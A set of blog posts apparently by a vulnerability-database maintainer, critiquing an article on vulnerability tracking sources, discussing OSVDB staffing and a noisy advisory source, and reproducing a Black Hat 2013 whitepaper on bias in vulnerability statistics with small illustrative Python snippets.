“Now that you have a common calculator for interoperability among vendors, the fact that CVE is maintained completely transparently to the community is a HUGE pro,” says Fred Wilmot, chief technology officer at PacketSled. “There is no holdout of exploits for vulnerabilities based on financial gain or intent. It’s altruism at its best. The weakness in the CVE comes in the weaponization of that information and the lack of disclosure for profit and activism, as two examples.”

Where to start…

  1. There is no common calculator for “interoperability among vendors” in the context of CVE. That isn’t what CVE is or does.
  2. CVE is most certainly not maintained transparently to the community. It is not maintained transparently to the volunteer Editorial Board (now known simply as the ‘CVE Board’) either. The backroom workings and decisions MITRE makes on behalf of CVE without Board or public input have been documented before. The last decision that lacked any transparency was their recent catastrophic decision to change the CVE format to a new ‘federated’ scheme. If you have any doubt about this being a backroom decision, look at the first reply from CVE Board member Kurt Seifried.
  3. Wilmot’s characterization that CVE is “altruism at its best” also speaks to a lack of knowledge of CVE. While MITRE, the organization that maintains CVE, is technically a not-for-profit organization, they only take non-compete contracts at incredible expense to the U.S. taxpayer. CVE, and a handful of other ‘C’ projects related to information security, bring in considerable money to the company. In 2015, they enjoyed over $1.4 billion in revenue and maintained $788 million in assets. The fact that the contract to maintain CVE is non-compete, and cannot be bid on by companies more qualified to run the project, speaks to where the real interest lies and it isn’t altruistic.
  4. The weakness in CVE is certainly not the “weaponization” of that information. A significant majority of weaponized exploits that lead to the thousands of data breaches and organizations being compromised are typically done with functional exploits that enjoy little technical information being made public. For example, phishing attacks that rely on Adobe Reader or Adobe Flash are usually patched by Adobe eventually, and the subsequent disclosure has no technical details. Even if researchers post more details down the road, the entries in CVE are rarely updated to include the additional details.
  5. The last bit of Wilmot’s quote, I will need someone to explain to me. “The weakness in the CVE [..] comes in the lack of disclosure for profit and activism.” I don’t know what that means.

Page 5 tells readers about the CERT Vulnerability Notes Database:

The Vulnerability Notes Database provides information about software vulnerabilities. Vulnerability notes include summaries, technical details, remediation information, and lists of affected vendors. Most Vulnerability notes are the result of private coordination and disclosure efforts. For more comprehensive coverage of public vulnerability reports, consider the National Vulnerability Database (NVD).

“This is nice to have, but it still uses CVEs as reference,” says Fred Wilmot, chief technology officer at PacketSled. “NVD is not nearly as practical to consume directly as CVE — the disclosure form is fine, but why would I go there and not directly to MITRE for CVE establishment first? However, it’s probably a good place to spend time during an investigation.”

The CERT VNDB is not a comprehensive vulnerability database, and does not aim to be one. As mentioned, their information primarily comes via their assisting researchers in coordinating a disclosure with a vendor. Since CERT is a CNA, meaning they can assign CVE IDs to vulnerabilities they coordinate, over 99% of their entries are covered by CVE and thus NVD. Monitoring NVD will get you all of CVE and almost all of CERT VNDB. The rare CERT VU entries that do not have CVE IDs assigned before disclosure get assignments from MITRE shortly after, I believe.

Once again, Wilmot speaks about these sources without appearing to have real working knowledge, which personifies my term ‘vulnerability tourist’. CERT VNDB disclosures appear on their site before they appear in CVE or NVD; in fact, it may be 24 – 72 hours before they appear there, meaning that while the database still uses CVEs as a reference, for timely monitoring of vulnerabilities it may be important to keep an eye on CERT directly. Next, Wilmot goes on to say “NVD is not nearly as practical to consume directly as CVE”, apparently not realizing that NVD makes its data available in XML. While MITRE makes the CVE data available in several formats, that does not mean NVD is hard to consume. The most important distinction here is that NVD comes with CPE data where CVE does not. For any medium to large organization, this is basically mandatory meta-data for actually putting the information to use.

Page 6 tells readers about Risk Based Security’s VulnDB offering. The curious bit to me is the quote from Morey Haber:

“VulnDB does not contain audit information, but it is a good source for solutions that need to reference vulnerability information in their products such as firewalls or IDS/IPS and do not want to rely on open source or to build/maintain a library,” said Morey Haber, VP of technology at BeyondTrust.

First, BeyondTrust is not a user of VulnDB, which is a commercial offering unlike CVE/NVD/CERT. They did a short-term trial in 2012, during the beginning of the offering, and opted not to pursue it as a source of vulnerability intelligence. Second, what does “audit information” even mean in the context of a VDB? Audit information about your own environment, maybe? That is something a vulnerability intelligence provider can’t possibly deliver. An audit trail is maintained for each vulnerability entry and is available to customers, but I doubt that is what he means, since calling VulnDB out on this doesn’t make sense and the other vulnerability sources listed in this article don’t maintain such a trail.

While VulnDB can certainly be used to reference vulnerabilities in security products as he says, that is the tip of the iceberg. With over 47,000 vulnerabilities not found in CVE or NVD, the breadth of information is incredible. Further, VulnDB has made a concerted effort for years to track vulnerabilities in third-party libraries, and builds on top of the robust meta-data that has been generated for over a decade. Haber’s comments do not reflect actual knowledge of the VulnDB offering.

Page 7 tells readers about the DISA IAVA Database And STIGS. Haber gives commentary on this as well:

“IAVA, the DISA-based vulnerability mapping database, is based on existing SCAP sources, and once in a while it contains details for government systems that are not a part of the commercial world,” says Morey Haber, VP of technology at BeyondTrust. “For any vendor doing .gov or .mil work, this reference is a must.”

While some of the IAVA advisories may contain additional detail, it is important to note that they will not provide any vulnerabilities above and beyond CVE/NVD, and their advisories lag well behind the issues being published in CVE/NVD. Haber is right that this is a vital resource for .gov and .mil contractors, for several reasons.

Page 8 tells readers about SecurityTracker.com, which is a long-running site that aggregates vulnerabilities to a degree. Haber once again provides commentary:

“The website tends to focus on non-OS vulnerabilities, but they are certainly included in the feed,” says Morey Haber, VP of technology at BeyondTrust. “Infrastructure and IoT tend to make the front page the most, and this site is a good third-party reference for new flaws.”

Actually, they do focus on OS vulnerabilities, and that can routinely be seen on their site. As I write this, 2 of the 5 vulnerabilities listed on the front page are in operating systems. The biggest thing to note about this offering is that, publicly, they just don’t aggregate a significant volume of vulnerabilities. Their most recent ID is 1037091, meaning they have ~37,000 entries in their database. Note that they operate like CVE though, where multiple vulnerabilities can be associated with a single ID. Regardless, reading their Weekly Vulnerability Summary emails for the past five weeks shows their volume: Sep 26 2016 (32 alerts), Oct 3 2016 (17 alerts), Oct 10 2016 (26 alerts), Oct 17 2016 (31 alerts), and Oct 24 2016 (32 alerts). To put that into perspective, VulnDB has averaged 46 new entries a day in 2016, with the most being 224 in a single day. For the most part, SecurityTracker may beat CVE on adding to the database, but they are almost entirely covering entries that have CVE IDs.

Page 9 tells readers about the Open Vulnerability And Assessment Language (OVAL) Interpreter And Repository. This is a curious addition to the article because it is not a source of vulnerability intelligence. Instead, it is a standard for reporting about systems. From the OVAL page:

International in scope and free for public use, OVAL is an information security community effort to standardize how to assess and report upon the machine state of computer systems. OVAL includes a language to encode system details, and an assortment of content repositories held throughout the community.

While OVAL is certainly useful to some organizations, it does not belong in a list of vulnerability sources.

Page 10 tells readers about Information Sharing And Analysis Centers (ISACs). This is another curious addition as ISACs typically trade information on active attacks, threat actors, and which vulnerabilities may be targeted more heavily. They are generally not a source of vulnerabilities in the same context as most of the resources above.

In summary, Sean Martin’s article says it will share “9 Sources For Tracking New Vulnerabilities”. In reality, based on that quote and context, the article only tells readers about CVE/NVD, CERT VNDB, RBS VulnDB, and SecurityTracker. Several of the sources listed are not really for tracking new vulnerabilities; rather, they augment vulnerability threat intelligence in various ways.

OSVDB – How many people work on this project?

[This was originally published on the OSVDB blog.]

We are occasionally asked how many people work on OSVDB. This question comes from those familiar with the project, and potential customers of our vulnerability intelligence feed. Back in the day, I had no problem answering it quickly and honestly. For years we limped along with one “full time” (unpaid volunteer) and a couple part-timers (unpaid volunteers), where those terms were strictly based on the hours worked. Since the start of 2012 though, we have had actual full-timers doing daily work on the project. This comes through the sponsorship provided by Risk Based Security (RBS), who also provided us with a good amount of developer time and hosting resources. Note that we are also frequently asked how much data comes from the community, to which we giggle and answer “virtually none” (less than 0.01%).

These days however, I don’t like to answer that question because it frequently seems to be a recipe for critique. For example, on one potential client call we were asked how many employees RBS had working on the offering. I answered honestly that it was only three at the time, because that was technically true. That didn’t represent the number of bodies, as one was full-time but not at RBS, and two were not full-time. Before that could be qualified, the potential client scoffed loudly: “there is no way you do that much with so few people”. Despite explaining that we had more than three people, I simply offered for them to enjoy a 30 day free trial of our data feed. Let the data answer his question.

To this day, if we say we have #lownumber, we get the response above. If we say we have #highnumber that includes part timers and drive-by employees (that are not tasked with this work but can dabble if they like), then we face criticism that we don’t output enough. Yes, despite us aggregating and producing over twice as much content as any of our competitors, we face that silly opinion. The number of warm bodies also doesn’t speak to the skill level of everyone involved. Two of our full time workers (one paid, one unpaid) have extensive history managing vulnerability databases and have continually evolved the offerings over the years. While most VDBs look the same as they did 10 years ago, OSVDB has done a lot to aggregate more data and more meta-data about each vulnerability than anyone else. We have been ahead of the curve at almost every turn, understanding and adapting to the challenges and pitfalls of VDBs.

So to officially answer the question, how many people work on this project? We have just enough. We make sure that we have the appropriate resources to provide the services offered. When we get more customers, we’ll hire more people to take on the myriad of additional projects and data aggregation we have wanted to do for years. Data that we feel is interesting and relevant, but no one is asking for yet. Likely because they haven’t thought of it, or haven’t realized the value of it. We have a lot more in store, and it is coming sooner than later now that we have the full support of RBS. If you are using any other vulnerability intelligence feed, it is time to consider the alternative.

We’re Doing the Unthinkable

[This was originally published on the OSVDB blog.]

Anyone who knows me in the context of vulnerability databases will find this post a tad shocking, even if they have endured my rants about it before.

For the first time ever, I am making it policy that we will no longer put any priority on Vulnerability Lab advisories. For those unfamiliar with the site, it is run by Benjamin Kunz Mejri, who now has a new company, Evolution Security.

If you read that web site, and even a history of his/VL disclosures, it looks impressive on the surface. Yes, they have found some legitimate vulnerabilities, even in high-profile vendors. Most, if not all, are pedestrian web application vulnerabilities such as cross-site scripting, traversals, or file upload issues. More complex vulnerabilities like overflows typically end up being what we call “self hacks”, and do not result in the crossing of privilege boundaries. Many of their published vulnerabilities require excessive conditions and offer no real exploit scenario.

During the past 10 months, I know of three other vulnerability databases that officially gave up on adding their advisories. Nothing public, but the internal memo was “don’t bother”. OSVDB was the holdout. We did our best to keep up with their stream of horrible advisories. I personally offered to help them re-write and refine their advisory process several times. I started out nicely, giving a sincere offer of my time and experience, and it went unanswered. I slowly escalated, primarily on Twitter, giving them grief over their disclosures. Eventually, their advisories became nothing but an annoyance and incredible time sink. Then I got ugly, and I have been to this day. No, not my proudest moment, but I stand by it 100%.

As of tonight, we are giving in as well. Vulnerability Lab advisories represent too much of a time sink in trying to decipher their meaning; they simply aren’t worth adding. For cases where the software is more notable, we will continue to slam our head against the wall and figure them out. For the rest, they are getting deprioritized in the form of a “to do when we run out of other import sources”. Since we monitor over 1,100 sources including blogs, web sites, changelogs, and bug trackers, that is not happening for a long time.

I truly regret having to do this. One of my biggest joys of running a vulnerability database is in cataloging all the vulnerabilities. ALL OF THEM.

So this also serves as my final offer Benjamin. Search the VDBs out there and notice how few of your advisories end up in them. Think about why that is. If you are as smart as you think you are, you will choke down your pride and accept my offer of help. I am willing to sink a lot of time into helping you improve your advisories. This will in turn help the rest of the community, and what I believe are your fictitious customers. As I have told you several times before, there is no downside to this for you, just me. I care about helping improve security. Do you?

Buying Into the Bias: Why Vulnerability Statistics Suck

[This was originally published on the OSVDB blog.]

Last week, Steve Christey and I gave a presentation at Black Hat Briefings 2013 in Las Vegas about vulnerability statistics. We submitted a brief whitepaper on the topic, reproduced below, to accompany the slides that are now available.


Buying Into the Bias: Why Vulnerability Statistics Suck
By Steve Christey (MITRE) and Brian Martin (Open Security Foundation)
July 11, 2013

Academic researchers, journalists, security vendors, software vendors, and professional analysts often analyze vulnerability statistics using large repositories of vulnerability data, such as “Common Vulnerabilities and Exposures” (CVE), the Open Sourced Vulnerability Database (OSVDB), and other sources of aggregated vulnerability information. These statistics are claimed to demonstrate trends in vulnerability disclosure, such as the number or type of vulnerabilities, or their relative severity. Worse, they are typically misused to compare competing products to assess which one offers the best security.

Most of these statistical analyses demonstrate a serious fault in methodology, or are pure speculation in the long run. They use easily-available but drastically misunderstood data to craft irrelevant questions based on wild assumptions, while never figuring out (or even asking the sources about) the limitations of the data. This leads to a wide variety of bias that typically goes unchallenged and ultimately forms statistics that make headlines and, far worse, are used to justify security budgets and spending.

As maintainers of two well-known vulnerability information repositories, we’re sick of hearing about research that is quickly determined to be sloppy after it’s been released and gained public attention. In almost every case, the research casts aside any logical approach to generating the statistics. They frequently do not release their methodology, and they rarely disclaim the serious pitfalls in their conclusions. This stems from their serious lack of understanding about the data source they use, and how it operates. In short, vulnerability databases (VDBs) are very different and very fickle creatures. They are constantly evolving and see the world of vulnerabilities through very different glasses.

This paper and its associated presentation introduce a framework in which vulnerability statistics can be judged and improved. The better we get at talking about the issues, the better the chances of truly improving how vulnerability statistics are generated and interpreted.

Bias, We All Have It

Bias is inherent in everything humans do. Even the most rigorous and well-documented process can be affected by levels of bias that we simply do not understand are working against us. This is part of human nature. As with all things, bias is present in the creation of the VDBs, how the databases are populated with vulnerability data, and the subsequent analysis of that data. Not all bias is bad; for example, VDBs have a bias to avoid providing inaccurate information whenever possible, and each VDB effectively has a customer base whose needs directly drive what content is published.

Bias comes in many forms that we see as strongly influencing vulnerability statistics, via a number of actors involved in the process. It is important to remember that VDBs catalog the public disclosure of security vulnerabilities by a wide variety of people with vastly different skills and motivations. The disclosure process varies from person to person and introduces bias for sure, but even before the disclosure occurs, bias has already entered the picture.

Consider the general sequence of events that lead to a vulnerability being cataloged in a VDB.

  1. A researcher chooses a piece of software to examine.
  2. Each researcher operates with a different skill set and focus, using tools or techniques with varying strengths and weaknesses; these differences can impact which vulnerabilities are capable of being discovered.
  3. During the process, the researcher will find at least one vulnerability, often more.
  4. The researcher may or may not opt for vendor involvement in verifying or fixing the issue.
  5. At some point, the researcher may choose to disclose the vulnerability. That disclosure will not be in a common format, may suffer from language barriers, may not be technically accurate, may leave out critical details that impact the severity of the vulnerability (e.g. administrator authentication required), may be a duplicate of prior research, or introduce a number of other problems.
  6. Many VDBs attempt to catalog all public disclosures of information. This is a “best effort” activity, as there are simply too many sources for any one VDB to monitor, and accuracy problems can increase the expense of analyzing a single disclosure.
  7. If the VDB maintainers see the disclosure mentioned above, they will add it to the database if it meets their criteria, which are not always public. If the VDB does not see the disclosure, it will not be added. If the VDB disagrees with the disclosure (i.e. believes it to be inaccurate), it may not be added.

By this point, there are a number of criteria that may prevent the disclosure from ever making it into a VDB. Without using the word, the above steps have introduced several types of bias that impact the process. These biases carry forward into any subsequent examination of the database in any manner.

Types of Bias

Specific to the vulnerability disclosure aggregation process that VDBs go through every day, there are four primary types of bias that enter the picture. Note that while each of these can be seen in researchers, vendors, and VDBs, some are more common to one than the others. There are other types of bias that could also apply, but they are beyond the scope of this paper.

Selection bias covers what gets selected for study. In the case of disclosure, this refers to the researcher’s bias in selecting software and the methodology used to test the software for vulnerabilities; for example, a researcher might only investigate software written in a specific language and only look for a handful of the most common vulnerability types. In the case of VDBs, this involves how the VDB discovers and handles vulnerability disclosures from researchers and vendors. Perhaps the largest influence on selection bias is that many VDBs monitor a limited set of disclosure sources. It is not necessary to argue what “limited” means; suffice it to say, no VDB is remotely complete in monitoring every source of vulnerability data that is public on the net. Lack of resources – primarily the time of those working on the database – causes a VDB to prioritize sources of information. With an increasing number of regional or country-based CERT groups disclosing vulnerabilities in their native tongues, VDBs have a harder time processing the information. Every vulnerability that is disclosed but does not end up in the VDB ultimately skews statistics such as “there were X vulnerabilities disclosed last year”.
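
To make the effect concrete, here is a toy sketch of how limited source monitoring deflates an annual disclosure count. Every source name and figure below is invented purely for illustration:

    # Toy model of selection bias: a VDB that monitors only some disclosure
    # sources will under-count "vulnerabilities disclosed last year".
    # All source names and numbers here are invented for illustration.
    SOURCES = {
        "mailing_lists": 4000,
        "vendor_advisories": 3000,
        "regional_certs": 1500,   # often published in languages the VDB cannot process
        "blogs_and_forums": 2500,
    }

    MONITORED = {"mailing_lists", "vendor_advisories"}  # limited coverage

    true_total = sum(SOURCES.values())
    observed = sum(count for src, count in SOURCES.items() if src in MONITORED)

    print(f"Actual public disclosures: {true_total}")  # 11000
    print(f"VDB-observed count:        {observed}")    # 7000
    print(f"Undercount:                {1 - observed / true_total:.0%}")  # 36%

A statistic built on the observed count is not wrong because of bad math; it is wrong because the denominator was biased before any math happened.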

Publication bias governs what portion of the research gets published. This ranges from “none”, to sparse information, to incredible technical detail about every finding. Somewhere between selection and publication bias, the researcher will determine how much time to spend on a particular product, which vulnerabilities they are interested in, and more. All of this folds into what gets published. VDBs may discover a researcher’s disclosure, but then decide not to publish the vulnerability due to other criteria.

Abstraction bias is a term that we crafted to explain the process that VDBs use to assign identifiers to vulnerabilities. Depending on the purpose and stated goal of the VDB, the same 10 vulnerabilities may be given a single identifier by one database, and 10 identifiers by a different one. This level of abstraction is an absolutely critical factor when analyzing the data to generate vulnerability statistics. It is also the most prevalent source of problems for analysis, as researchers rarely understand the concept of abstraction, why it varies, and how to overcome it as an obstacle in generating meaningful statistics. Researchers will use whichever abstraction is most appropriate or convenient for them; after all, there are many different consumers for a researcher advisory, not just VDBs. Abstraction bias is also frequently seen in vendors, and occasionally in researchers, in the way they disclose one vulnerability multiple times because it affects several products that bundle another vendor’s software.
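
A toy example makes the counting problem obvious. Assume a single advisory reporting the same type of flaw in ten scripts of one product; the product name and details below are invented:

    # Toy illustration of abstraction bias: one advisory, two catalog policies.
    # The product, flaw type, and script names are all invented.
    disclosure = {
        "product": "ExampleCMS",
        "type": "XSS",
        "affected_scripts": [f"page{i}.php" for i in range(1, 11)],
    }

    # Policy A (coarse): one identifier per advisory.
    coarse_count = 1

    # Policy B (fine): one identifier per affected script.
    fine_count = len(disclosure["affected_scripts"])

    print(f"Coarse-abstraction VDB records {coarse_count} vulnerability")
    print(f"Fine-abstraction VDB records   {fine_count} vulnerabilities")

The underlying research is identical, yet naive counting reports a tenfold difference between the two databases.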

Measurement bias refers to potential errors in how a vulnerability is analyzed, verified, and cataloged. For example, with researchers, this bias might take the form of failing to verify that a potential issue is actually a vulnerability, or of over-estimating the severity of the issue compared to how consumers might prioritize it. With vendors, measurement bias may affect how the vendor prioritizes an issue to be fixed, or lead to under-estimating the severity of the issue. With VDBs, measurement bias may also occur if analysts do not appropriately reflect the severity of the issue, or if inaccuracies are introduced while studying incomplete vulnerability disclosures, such as missing a version of the product that is affected by the vulnerability. It could be argued that abstraction bias is a certain type of measurement bias (since it involves using inconsistent “units of measurement”), but for the purposes of understanding vulnerability statistics, abstraction bias deserves special attention.
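
One place measurement bias shows up directly in the numbers is scoring. The sketch below implements the standard published CVSSv2 base equation, then scores the same hypothetical flaw twice: once with the worst-case assumptions an analyst is forced into by a vague disclosure, and once after details reveal a limited impact:

    # Minimal CVSSv2 base-score calculator (the standard published equation
    # and metric values).
    AV = {"N": 1.0, "A": 0.646, "L": 0.395}   # Access Vector
    AC = {"L": 0.71, "M": 0.61, "H": 0.35}    # Access Complexity
    AU = {"N": 0.704, "S": 0.56, "M": 0.45}   # Authentication
    CIA = {"C": 0.660, "P": 0.275, "N": 0.0}  # Conf/Integ/Avail impact

    def cvss2_base(av, ac, au, c, i, a):
        impact = 10.41 * (1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a]))
        exploitability = 20 * AV[av] * AC[ac] * AU[au]
        f_impact = 0 if impact == 0 else 1.176
        return round(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact, 1)

    # A vague "remote vulnerability" scored with worst-case assumptions:
    print(cvss2_base("N", "L", "N", "C", "C", "C"))  # 10.0
    # The same flaw once details show only a limited information leak:
    print(cvss2_base("N", "L", "N", "P", "N", "N"))  # 5.0

The equation itself is deterministic; the bias lives entirely in the inputs chosen when the disclosure is incomplete.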

Measurement bias, as it affects statistics, is arguably the domain of VDBs, since most statistics are calculated using an underlying VDB instead of the original disclosures. Because VDBs are the primary points of vulnerability data aggregation, several factors come into play when they perform database updates.

Why Bias Matters, in Detail

These forms of bias can work together to create interesting spikes in vulnerability disclosure trends. To the VDB worker, they are typically apparent and sometimes amusing. To an outsider just using a data set to generate statistics, they can be a serious pitfall.

In August 2008, a single researcher using rudimentary yet effective methods for finding symlink vulnerabilities single-handedly caused a spike in symlink vulnerability disclosures that stands out against the prior ten years. Starting in 2012 and continuing up to the publication of this paper, a pair of researchers have significantly impacted the number of disclosures in a single product. Not only has this caused a huge spike in the vulnerability count related to the product, it has led to them being ranked as two of the top vulnerability disclosers since January 2012. Later this year, we expect articles to be written regarding the number of supervisory control and data acquisition (SCADA) vulnerabilities disclosed from 2012 to 2013. Those articles will be based purely on vulnerability counts as determined from VDBs, likely with no mention of why the numbers are skewed. One prominent researcher who published many SCADA flaws has changed his personal disclosure policy: instead of publicly disclosing details, he now keeps them private as a competitive advantage for his new business.

Another popular place for vulnerability statistics to break down is vulnerability severity. Researchers and journalists like to cite the raw number of vulnerabilities in two products and compare their relative security. They frequently overlook the severity of the vulnerabilities, failing to note that while one product had twice as many disclosures, a significant percentage of them were low severity. Further, they do not understand how the industry-standard CVSSv2 scoring system works, or the bias that can creep in when using it to score vulnerabilities. Since a vague disclosure with few actionable details will frequently be scored for the worst possible impact, severity ratings are drastically skewed as well.
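
As a sketch of why raw counts mislead, consider two hypothetical products with entirely invented CVSSv2 scores:

    # Two invented products: B has twice the disclosures, A carries the risk.
    product_a = [9.3, 9.0, 7.5, 7.2, 6.8]
    product_b = [7.5, 4.3, 4.0, 3.5, 2.6, 2.6, 2.1, 1.9, 1.7, 1.2]

    def summarize(name, scores):
        high = sum(1 for s in scores if s >= 7.0)  # CVSSv2 "high" band
        low = sum(1 for s in scores if s < 4.0)    # CVSSv2 "low" band
        print(f"{name}: {len(scores)} total, {high} high, {low} low, "
              f"mean {sum(scores) / len(scores):.1f}")

    summarize("Product A", product_a)  # 5 total, 4 high, 0 low, mean 8.0
    summarize("Product B", product_b)  # 10 total, 1 high, 7 low, mean 3.1

A headline claiming “Product B had twice as many vulnerabilities as Product A” would be technically true and completely misleading.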

Conclusion

The forms of bias outlined in this paper, and the ways they may impact vulnerability statistics, are just the beginning. For each party involved, and for each type of bias, there are many considerations that must be made. Accurate and meaningful vulnerability statistics are not impossible; they are just very difficult to generate and disclaim accurately.

Our 2013 BlackHat Briefings USA talk hopes to explore many of these points, outline the types of bias, and show concrete examples of misleading statistics. In addition, we will show how you can easily spot questionable statistics, and give some tips on generating and disclaiming good statistics.